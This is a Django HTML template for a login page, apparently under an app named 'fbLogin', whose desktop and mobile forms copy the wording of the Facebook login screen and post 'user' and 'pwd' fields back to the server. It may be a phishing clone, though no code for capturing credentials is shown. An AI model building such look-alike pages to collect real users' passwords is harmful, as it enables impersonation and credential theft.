{% extends 'fbLogin/base.html' %}

{% block content %}
{% if messages %}
{{ messages }}
{% endif %}
<form method="POST">
    {% csrf_token %}
<table>
    <tr>
      <td class="logintext">Email or Phone</td>
      <td class="logintext"><span class="loginrowgap">Password</span></td>
    </tr>
      <td><input class="logintext loginfield" name="user" type="text"></td>
      <td><input class="logintext loginrowgap loginfield" name="pwd" type="password"></td>
      <td><input class="loginrowgap" id="loginbutton" type="submit" value="Log In"></td>
    </tr>
    <tr>
      <td></td>
      <td><a href="#" class="logintext loginrowgap" id="forgotpw">Forgotten account?</a></td>
    </tr>
  </table>
</form>
{% endblock %}

{% block mobile %}
<form method="POST">
  {% csrf_token %}
<div id="mobtextdiv">
  <input type="text" class="mobtextbox mobtextbox1" name="user" placeholder="Mobile number or email address">
  <input type="password" class="mobtextbox mobtextbox2" name="pwd" placeholder="Password">
</div>
<div class="mobloginbuttondiv">
  <input type="submit" class="mobloginbutton" value="Log In">
</div>
<div id="ordiv">
<span id="or">or</span>
</div>
<div id="mobcreatediv">
  <button id="mobcreate">Create New Account</button>
</div>
<div class="mobforgotpw">
  <a href="#">Forgotten password?</a>
  <span>·</span>
  <a href="#">Help Center</a>
</div>
</div>
</form>
{% endblock %}
